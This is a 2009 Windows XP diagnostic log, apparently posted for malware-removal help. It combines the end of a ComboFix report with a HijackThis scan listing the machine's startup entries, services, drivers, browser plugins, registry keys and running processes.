"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
"PivotSoftware"="c:\program files\Portrait Displays\Pivot Software\wpctrl.exe"
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring"=dword:00000001
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
"DisableMonitoring"=dword:00000001
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"c:\\Program Files\\Support.com\\bin\\tgcmd.exe"=
"c:\\Program Files\\Windows Media Player\\wmplayer.exe"=
"c:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"c:\\Program Files\\Morpheus\\Morpheus.exe"=
"c:\\Program Files\\Google\\Google Talk\\googletalk.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"c:\\Program Files\\DropBox\\DropBox\\DropBox.exe"=
"c:\\Program Files\\Microsoft Office\\Office12\\ONENOTE.EXE"=
"c:\\Program Files\\Microsoft LifeCam\\LifeCam.exe"=
"c:\\Program Files\\Microsoft LifeCam\\LifeEnC2.exe"=
"c:\\Program Files\\Microsoft LifeCam\\LifeExp.exe"=
"c:\\Program Files\\Microsoft LifeCam\\LifeTray.exe"=
"c:\\Program Files\\Messenger\\msmsgs.exe"=
"c:\\Program Files\\Common Files\\McAfee\\MNA\\McNASvc.exe"=
"c:\\Documents and Settings\\Mrs. Richards\\Local Settings\\Application Data\\Google\\Google Talk Plugin\\googletalkplugin.dll"=
"c:\\Documents and Settings\\Mrs. Richards\\Local Settings\\Application Data\\Google\\Google Talk Plugin\\googletalkplugin.exe"=
"c:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"c:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
R0 AC2003;AC2003;c:\windows\system32\drivers\AC2003.sys [2004-07-25 3584]
R0 SI3112r;Silicon Image SiI 3112 SATARaid Controller;c:\windows\system32\drivers\SI3112r.sys [2004-05-12 97408]
R2 LMIInfo;LogMeIn Kernel Information Provider;c:\program files\LogMeIn\x86\rainfo.sys [2007-08-03 12856]
R2 LMIRfsDriver;LogMeIn Remote File System Driver;c:\windows\system32\drivers\LMIRfsDriver.sys [2007-11-29 47640]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [2008-08-28 206096]
R3 CLEDX;Team H2O CLEDX service;c:\windows\system32\drivers\cledx.sys [2005-12-26 33792]
R3 EloBus;Elobus Filter Driver;c:\windows\system32\drivers\EloBus.sys [2007-01-20 14848]
R3 EloSer;Elo Serial Driver;c:\windows\system32\drivers\EloSer.Sys [2007-01-20 45568]
R3 MSHUSBVideo;NX6000/NX3000/VX5000/VX7000 Filter Driver;c:\windows\system32\drivers\nx6000.sys [2008-08-09 33800]
R3 SMC1211;SMC EZ Card 10/100 PCI (SMC1211 Series) NT 5.0 Driver;c:\windows\system32\drivers\SMC1211.sys [2001-07-11 23153]
S1 MMstub;MMstub Driver;c:\windows\system32\DRIVERS\MMstub.sys --> c:\windows\system32\DRIVERS\MMstub.sys [?]
S2 0171901233147914mcinstcleanup;McAfee Application Installer Cleanup (0171901233147914);c:\windows\TEMP\017190~1.EXE c:\progra~1\COMMON~1\McAfee\INSTAL~1\cleanup.ini -cleanup -nolog -service --> c:\windows\TEMP\017190~1.EXE c:\progra~1\COMMON~1\McAfee\INSTAL~1\cleanup.ini -cleanup -nolog -service [?]
S2 gupdate1c98bee6cb9fb98;Google Update Service (gupdate1c98bee6cb9fb98);c:\program files\Google\Update\GoogleUpdate.exe [2009-02-10 133104]
S2 monmouse;Monmouse Driver;c:\windows\system32\DRIVERS\monmouse.sys --> c:\windows\system32\DRIVERS\monmouse.sys [?]
S3 GoogleDesktopManager-110408-113106;Google Desktop Manager 5.8.811.4345;c:\program files\Google\Google Desktop Search\GoogleDesktop.exe [2005-05-06 30192]
S3 KORGUMDS;KORG USB-MIDI Driver for Windows XP;c:\windows\system32\drivers\KORGUMDS.SYS [2004-07-11 12544]
S3 radpms;Driver for RADPMS Device;c:\windows\system32\DRIVERS\radpms.sys --> c:\windows\system32\DRIVERS\radpms.sys [?]
S4 AloPort;AloPort;c:\windows\system32\drivers\AloPort.sys [2004-07-25 3087]
S4 LMIRfsClientNP;LMIRfsClientNP; [x]
--- Other Services/Drivers In Memory ---
*NewlyCreated* - GOOGLEDESKTOPMANAGER-110408-113106
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{2fd84b48-4ab8-11dd-a45e-0010b565f1d5}]
\Shell\AutoRun\command - c:\windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL autorun.exe
.
Contents of the 'Scheduled Tasks' folder
2008-01-01 c:\windows\Tasks\Backup.job
- c:\windows\system32\ntbackup.exe [2001-08-17 22:36]
2009-02-11 c:\windows\Tasks\Google Software Updater.job
- c:\program files\Google\Common\Google Updater\GoogleUpdaterService.exe [2009-02-08 10:56]
2009-02-11 c:\windows\Tasks\GoogleUpdateTaskMachine.job
- c:\program files\Google\Update\GoogleUpdate.exe [2009-02-10 21:28]
2009-02-11 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1275210071-796845957-839522115-1004.job
- c:\documents and settings\David\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [2008-09-02 23:12]
2009-02-11 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1275210071-796845957-839522115-1010.job
- c:\documents and settings\Mrs. Richards\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [2008-11-12 18:37]
2009-01-15 c:\windows\Tasks\McDefragTask.job
- c:\windows\system32\defrag.exe [2008-04-13 19:12]
2009-02-01 c:\windows\Tasks\McQcTask.job
- c:\program files\mcafee\mqc\QcConsol.exe [2008-07-09 17:10]
2009-02-05 c:\windows\Tasks\Spybot - Search & Destroy - Scheduled Task.job
- c:\program files\Spybot - Search & Destroy\SpybotSD.exe [2008-07-30 13:45]
2009-02-11 c:\windows\Tasks\User_Feed_Synchronization-{262578A8-0CC7-4369-953F-800F1B773610}.job
- c:\windows\system32\msfeedssync.exe [2006-10-17 11:58]
2009-02-11 c:\windows\Tasks\User_Feed_Synchronization-{2A50439D-5D8A-4C95-B940-18961C5CA924}.job
- c:\windows\system32\msfeedssync.exe [2006-10-17 11:58]
2009-02-11 c:\windows\Tasks\User_Feed_Synchronization-{9D5DE8E1-A15F-4186-BFF7-B3EC781BA0FD}.job
- c:\windows\system32\msfeedssync.exe [2006-10-17 11:58]
.
- - - - ORPHANS REMOVED - - - -
BHO-{815DA7A2-230F-4F5E-B783-1F13341DEA79} - (no file)
BHO-{A397DAB5-063F-4105-83DB-1BFE56D3816D} - (no file)
BHO-{D38232E4-644C-4B95-B446-130B686E6EB8} - (no file)
HKLM-Explorer_Run-application - c:\program files\AKProg\AKProg.exe
Notify-AtiExtEvent - (no file)
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/webhp
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
mWindow Title = I love Katie ; -) From David
uInternet Settings,ProxyOverride = *.local
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
FF - ProfilePath - c:\documents and settings\David\Application Data\Mozilla\Firefox\Profiles\default.jy3\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com/webhp?rls=ig
FF - component: c:\program files\McAfee\SiteAdvisor\components\McFFPlg.dll
FF - component: c:\program files\Mozilla Firefox\components\GoogleDesktopMozilla.dll
FF - plugin: c:\documents and settings\David\Local Settings\Application Data\Google\Update\1.2.133.33\npGoogleOneClick7.dll
FF - plugin: c:\progra~1\Yahoo!\Common\npyaxmpb.dll
FF - plugin: c:\program files\Google\Google Earth Plugin\npgeplugin.dll
FF - plugin: c:\program files\Google\Google Updater\2.4.1487.6512\npCIDetect13.dll
FF - plugin: c:\program files\Google\Update\1.2.141.5\npGoogleOneClick7.dll
FF - plugin: c:\program files\Mozilla Firefox\plugins\NPCIG.dll
FF - plugin: c:\program files\Mozilla Firefox\plugins\npGoogleGadgetPluginFirefoxWin.dll
FF - plugin: c:\program files\Mozilla Firefox\plugins\NPMGWRAP.DLL
FF - plugin: c:\program files\Mozilla Firefox\plugins\npOGAPlugin.dll
FF - plugin: c:\program files\Mozilla Firefox\plugins\npRACtrl.dll
FF - plugin: c:\program files\Picasa2\npPicasa2.dll
---- FIREFOX POLICIES ----
FF - user.js: dom.disable_open_during_load - true // Popupblocker control handled by McAfee Privacy Service
.
**************************************************************************
catchme 0.3.1367 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-02-10 23:03:45
Windows 5.1.2600 Service Pack 3 NTFS
scanning hidden processes ...
scanning hidden autostart entries ...
scanning hidden files ...
scan completed successfully
hidden files: 0
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{47629D4B-2AD3-4e50-B716-A66C15C63153}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"cd042efbbd7f7af1647644e76e06692b"=hex:e2,63,26,f1,3f,c8,ff,68,f4,d5,c3,9e,d0,
f8,20,05,e2,63,26,f1,3f,c8,ff,68,63,0c,64,0c,3a,2d,bd,8d,e2,63,26,f1,3f,c8,\
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{604BB98A-A94F-4a5c-A67C-D8D3582C741C}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"bca643cdc5c2726b20d2ecedcc62c59b"=hex:71,3b,04,66,8b,46,0d,96,4b,33,6e,58,b6,
f1,c4,48,6a,9c,d6,61,af,45,84,18,b5,60,d8,0c,62,bd,19,a4,6a,9c,d6,61,af,45,\
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{684373FB-9CD8-4e47-B990-5A4466C16034}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"2c81e34222e8052573023a60d06dd016"=hex:25,da,ec,7e,55,20,c9,26,bf,59,d1,1e,c1,
64,4f,5f,ff,7c,85,e0,43,d4,0e,fe,93,00,e7,4e,25,ec,54,b5,ff,7c,85,e0,43,d4,\
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{74554CCD-F60F-4708-AD98-D0152D08C8B9}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"2582ae41fb52324423be06337561aa48"=hex:86,8c,21,01,be,91,eb,e7,38,a5,fb,87,80,
25,b0,f3,86,8c,21,01,be,91,eb,e7,59,69,0e,4c,9d,af,bb,eb,86,8c,21,01,be,91,\
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{7EB537F9-A916-4339-B91B-DED8E83632C0}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"caaeda5fd7a9ed7697d9686d4b818472"=hex:cd,44,cd,b9,a6,33,6c,cd,f9,50,20,72,39,
76,0e,f7,f5,1d,4d,73,a8,13,5c,05,52,11,95,b9,cf,f4,47,f5,f5,1d,4d,73,a8,13,\
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{948395E8-7A56-4fb1-843B-3E52D94DB145}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"a4a1bcf2cc2b8bc3716b74b2b4522f5d"=hex:df,20,58,62,78,6b,cf,c8,f5,bd,bb,ee,51,
c8,17,e1,df,20,58,62,78,6b,cf,c8,73,c9,6b,ae,14,42,10,55,df,20,58,62,78,6b,\
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{AC3ED30B-6F1A-4bfc-A4F6-2EBDCCD34C19}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"4d370831d2c43cd13623e232fed27b7b"=hex:fb,a7,78,e6,12,2f,9a,ea,da,c8,a2,f9,29,
f9,24,b0,fb,a7,78,e6,12,2f,9a,ea,14,5a,fc,f0,1f,dc,fa,c7,fb,a7,78,e6,12,2f,\
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{DE5654CA-EB84-4df9-915B-37E957082D6D}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"1d68fe701cdea33e477eb204b76f993d"=hex:83,6c,56,8b,a0,85,96,ab,7e,92,f1,4b,9b,
c5,15,28,01,3a,48,fc,e8,04,4a,f1,80,6c,51,cd,47,42,e3,36,01,3a,48,fc,e8,04,\
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{E39C35E8-7488-4926-92B2-2F94619AC1A5}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"1fac81b91d8e3c5aa4b0a51804d844a3"=hex:51,fa,6e,91,28,9e,14,cc,30,69,45,31,47,
d0,c3,ef,f6,0f,4e,58,98,5b,89,c9,39,09,08,7b,9a,f4,db,73,f6,0f,4e,58,98,5b,\
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{EACAFCE5-B0E2-4288-8073-C02FF9619B6F}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"f5f62a6129303efb32fbe080bb27835b"=hex:b1,cd,45,5a,a8,c4,f8,b9,25,b4,dd,ca,95,
58,88,c9,3d,ce,ea,26,2d,45,aa,78,5b,df,2d,06,3c,15,b7,5e,3d,ce,ea,26,2d,45,\
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{F8F02ADD-7366-4186-9488-C21CB8B3DCEC}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"fd4e2e1a3940b94dceb5a6a021f2e3c6"=hex:e3,0e,66,d5,eb,bc,2f,6b,b5,ff,b6,b9,42,
da,19,99,2a,b7,cc,b5,b9,7f,41,e7,d2,69,ac,3e,9a,7d,a4,36,2a,b7,cc,b5,b9,7f,\
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{FEE45DE2-A467-4bf9-BF2D-1411304BCD84}\InprocServer32*]
"ThreadingModel"="Apartment"
@="c:\\WINDOWS\\system32\\OLE32.DLL"
"8a8aec57dd6508a385616fbc86791ec2"=hex:6c,43,2d,1e,aa,22,2f,9c,13,51,60,11,12,
67,ca,84,6c,43,2d,1e,aa,22,2f,9c,07,4c,11,9f,c1,dd,a1,a0,6c,43,2d,1e,aa,22,\
[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Reinstall\ØP�*]
"DisplayName"="?\13?\13"
"DeviceDesc"="?\13?\13"
"ProviderName"=""
"MFG"="???\\"
"ReinstallString"="c:\\WINDOWS\\System32\\ReinstallBackups\\?\13\\DriverFiles\\.INF"
"DeviceInstanceIds"=multi:"09236.inf\00"
.
--------------------- DLLs Loaded Under Running Processes ---------------------
- - - - - - - > 'winlogon.exe'(560)
c:\windows\system32\LMIinit.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Ahead\InCD\InCDsrv.exe
c:\windows\system32\LEXBCES.EXE
c:\program files\Avira\AntiVir PersonalEdition Classic\sched.exe
c:\program files\Avira\AntiVir PersonalEdition Classic\avguard.exe
c:\windows\system32\EloSrvce.exe
c:\program files\LogMeIn\x86\ramaint.exe
c:\program files\LogMeIn\x86\LogMeIn.exe
c:\program files\LogMeIn\x86\LMIGuardian.exe
c:\progra~1\McAfee\MSC\mcmscsvc.exe
c:\program files\Common Files\McAfee\MNA\McNASvc.exe
c:\progra~1\COMMON~1\McAfee\McProxy\McProxy.exe
c:\progra~1\McAfee\VIRUSS~1\Mcshield.exe
c:\program files\Microsoft LifeCam\MSCamS32.exe
c:\program files\McAfee\MSK\msksrver.exe
c:\windows\system32\nvsvc32.exe
c:\windows\system32\pctspk.exe
c:\windows\system32\HPZipm12.exe
c:\windows\system32\UAService7.exe
c:\progra~1\McAfee.com\Agent\mcagent.exe
c:\program files\Canon\CAL\CALMAIN.exe
c:\windows\system32\EloDkMon.exe
c:\windows\system32\EloTTray.exe
c:\windows\system32\wscntfy.exe
c:\program files\LogMeIn\x86\LMIGuardian.exe
c:\windows\system32\rundll32.exe
c:\windows\system32\rundll32.exe
c:\program files\OpenOffice.org 2.4\program\soffice.exe
c:\program files\OpenOffice.org 2.4\program\soffice.bin
c:\program files\McAfee\MPF\MpfSrv.exe
.
**************************************************************************
.
Completion time: 2009-02-10 23:17:48 - machine was rebooted [David]
ComboFix-quarantined-files.txt 2009-02-11 04:17:44
Pre-Run: 8,847,671,296 bytes free
Post-Run: 10,840,858,624 bytes free
Current=4 Default=4 Failed=3 LastKnownGood=5 Sets=2,3,4,5
404 --- E O F --- 2009-01-15 08:05:17
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:20:44 PM, on 2/10/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16762)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\Google\Update\GoogleUpdate.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINDOWS\system32\EloSrvce.exe
C:\Program Files\LogMeIn\x86\RaMaint.exe
C:\Program Files\LogMeIn\x86\LogMeIn.exe
C:\Program Files\LogMeIn\x86\LMIGuardian.exe
C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\program files\common files\mcafee\mna\mcnasvc.exe
c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\Program Files\Microsoft LifeCam\MSCamS32.exe
C:\Program Files\McAfee\MSK\MskSrver.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\pctspk.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\UAService7.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\WINDOWS\system32\EloDkMon.exe
C:\WINDOWS\system32\EloTTray.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
C:\Program Files\LogMeIn\x86\LMIGuardian.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Google\Google Talk\googletalk.exe
C:\Documents and Settings\David\Local Settings\Application Data\Google\Update\GoogleUpdate.exe
C:\Program Files\Olympus\DeviceDetector\DevDtct2.exe
C:\Program Files\OpenOffice.org 2.4\program\soffice.exe
C:\Program Files\OpenOffice.org 2.4\program\soffice.BIN
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: McAfee Phishing Filter - {27B4851A-3207-45A2-B947-BE8AFE6163AB} - c:\PROGRA~1\mcafee\msk\mskapbho.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: scriptproxy - {7DB2D5A0-7241-4E79-B68D-6309F01C5231} - C:\Program Files\McAfee\VirusScan\scriptsn.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.0.926.3450\swg.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O4 - HKLM\..\Run: [mcagent_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
O4 - HKLM\..\Run: [LogMeIn GUI] "C:\Program Files\LogMeIn\x86\LogMeInSystray.exe"
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [nForce Tray Options] sstray.exe /r
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [UserFaultCheck] %systemroot%\system32\dumprep 0 -u
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKCU\..\Run: [googletalk] C:\Program Files\Google\Google Talk\googletalk.exe /autostart
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Google Update] "C:\Documents and Settings\David\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c
O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')
O4 - Startup: ERUNT AutoBackup.lnk = C:\Program Files\ERUNT\AUTOBACK.EXE
O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
O4 - Startup: OpenOffice.org 2.4.lnk = C:\Program Files\OpenOffice.org 2.4\program\quickstart.exe
O4 - Global Startup: Acrobat Assistant.lnk.disabled
O4 - Global Startup: Adobe Gamma Loader.exe.lnk.disabled
O4 - Global Startup: Adobe Gamma Loader.lnk.disabled
O4 - Global Startup: Adobe Reader Speed Launch.lnk.disabled
O4 - Global Startup: Device Detector 2.lnk.disabled
O4 - Global Startup: Device Detector 3.lnk = C:\Program Files\Olympus\DeviceDetector\DevDtct2.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk.disabled
O4 - Global Startup: Microsoft Office.lnk.disabled
O4 - Global Startup: Microsoft Works Calendar Reminders.lnk.disabled
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Share in Hello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
O9 - Extra 'Tools' menuitem: Share in H&ello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {474F00F5-3853-492C-AC3A-476512BBC336} (UploadListView Class) - http://picasaweb.google.com/s/v/19.13/uploader2.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/en-us/4,0,0,83/mcinsctl.cab
O16 - DPF: {B9191F79-5613-4C76-AA2A-398534BB8999} (YAddBook Class) - http://us.dl1.yimg.com/download.yahoo.com/dl/installs/suite/yautocomplete.cab
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} (DwnldGroupMgr Class) - http://download.mcafee.com/molbin/shared/mcgdmgr/1,0,0,26/mcgdmgr.cab
O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} (Performance Viewer Activex Control) - https://secure.logmein.com/activex/ractrl.cab?lmi=100
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O23 - Service: McAfee Application Installer Cleanup (0171901233147914) (0171901233147914mcinstcleanup) - Unknown owner - C:\WINDOWS\TEMP\017190~1.EXE (file missing)
O23 - Service: Avira AntiVir Personal - Free Antivirus Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: Avira AntiVir Personal - Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
O23 - Service: EloSystemService - Elo Touchsystems, Inc. - C:\WINDOWS\system32\EloSrvce.exe
O23 - Service: Google Desktop Manager 5.8.811.4345 (GoogleDesktopManager-110408-113106) - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
O23 - Service: Google Update Service (gupdate1c98bee6cb9fb98) (gupdate1c98bee6cb9fb98) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: InCD Helper (read only) (InCDsrvR) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: LexBce Server (LexBceS) - Lexmark International, Inc. - C:\WINDOWS\system32\LEXBCES.EXE
O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\RaMaint.exe
O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\LogMeIn.exe
O23 - Service: MBackMonitor - McAfee - C:\Program Files\McAfee\MBK\MBackMonitor.exe
